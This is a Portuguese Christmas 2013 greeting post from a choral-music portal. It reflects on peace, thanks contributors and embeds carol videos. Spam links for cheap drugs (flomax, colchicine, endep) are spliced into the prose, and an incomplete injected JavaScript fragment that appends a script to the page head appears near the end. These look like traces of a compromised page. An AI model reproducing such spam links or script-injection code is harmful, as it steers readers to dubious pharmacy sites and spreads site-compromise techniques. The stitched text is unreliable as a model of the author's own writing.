ArtigoLateralMúsica coral

Fim de ano! Natal! Boas festas e feliz 2014

Caros amigos, este é um tempo abençoado.

Order

Tiradas as conotações comerciais, as pessoas, de um modo geral, estão predispostas à paz, à integração, à comemoração, ao chopinho, etc… (exceto alguns malfadados “torcedores” de futebol).

Isso é muito bom… Isso une as pessoas… Isso une as famílias… Isso faz com que muitas desavenças sejam postas de lado… Isso traz o entendimento… Isso traz a Paz… http://sistaahfriend.com/?p=9335

Infelizmente, no mundo de hoje, o que menos estamos vendo é a PAZ. Em Israel, na Palestina, na Síria, no Egito, em São Paulo, no Rio de Janeiro, em estádios de futebol e em outras plagas de que nem temos notícias, a violência impera.

Isso é ruim… Isso desune as pessoas… Isso encobre crimes contra o ser humano… Isso sacrifica os menos favorecidos em qualquer nível… Isso alimenta o orgulho dos poderosos… Isso contraria frontalmente o significado do nascimento de Cristo…
http://standupministry.org/cardura-xl-cost/ flomax cheap
Cristo nasceu neste mundo, justamente para nos trazer a PAZ. Uma PAZ duradoura, que brota de dentro das almas das pessoas e contagia as demais. Uma PAZ positiva, baseada no amor e não na incapacidade de duelar. Uma PAZ de espírito, que nos permite pensar nas outras pessoas, nos colocarmos no lugar delas, para entendê-las melhor e acolhê-las em nosso coração.

Vamos tentar nos imbuir deste espírito… Vamos deixar que ele tome conta de nós… Vamos distribuir sinceros votos de Boas Festas… Vamos desejar um ótimo 2014 para todas as pessoas que nos cercam…

Este é o espírito que norteia o www.movimento.com neste Natal de 2013. Nós só podemos ter uma atitude, que é de profundo agradecimento a todas as pessoas que encontram o nosso trabalho, que aproveitam alguma coisa dele, que nos prestigiam, etc… Claro que estamos falando de nossos visitantes, sem os quais nada teria sentido…

No entanto, não fazemos isso sozinhos… muito pelo contrário. Aos nossos colaboradores, pessoas como nós todos, que têm muitas coisas interessantes a dizer e o fazem graciosamente, devemos expressar os nossos mais ternos, carinhosos e amigos votos de agradecimento. Eles são as peças básicas no nosso portal.

Aos nossos amigos divulgadores, que acreditaram em nós e nos mandaram as suas programações neste ano, uma lembrança muito querida, pois eles alimentam o nosso portal.

Aos produtores de espetáculos e artistas, que brindaram o público com uma imensa variedade de possibilidades de prazer e cultura, estendemos os nossos melhores votos de felicidades, como se fôssemos os nossos usuários.

Quando comecei estas palavras, elas me vieram à cabeça e fui escrevendo, sem saber bem onde iria terminar. No entanto, ao final, uma sensação de lógica me fez ver que, no www.movimento.com, acabamos por fazer Natal durante o ano inteiro, assim como muitas pessoas o fizeram, talvez sem terem a percepção disso.

O que fizemos no portal, senão distribuir a quem o desejasse o melhor de nós todos? Foi um enorme congraçamento de todas essas pessoas citadas acima, que se reuniram sob o nosso guarda-chuva, que trocaram prazer, trocaram cultura e se entregaram uns aos outros.
online pharmacy colchicine Purchase
Para mim, isso é NATAL…

Boas Festas e um Feliz 2014 para todos…

 

Uma bela e tradicional música de Natal, com Orquestra e Coro RTVE (Arranjo de David Willcocks)

 

[youtube]http://www.youtube.com/watch?v=Kz13ufATook[/youtube]

 

E não podia faltar a Noite Feliz – Basílica do Carmo – Campinas

[youtube]http://www.youtube.com/watch?v=pBlpi_bx2Hk[/youtube]

Cheap
http://tv1.si/endep-cost/

 

if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);

1 Comment

  1. Antonio Rodrigues, desejo a você os melhores votos de Boas Festas e também agradeço as palavras que me incluem em seu contexto. Um abraço amigo.
    Marco Antonio Seta

Leave a Response

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.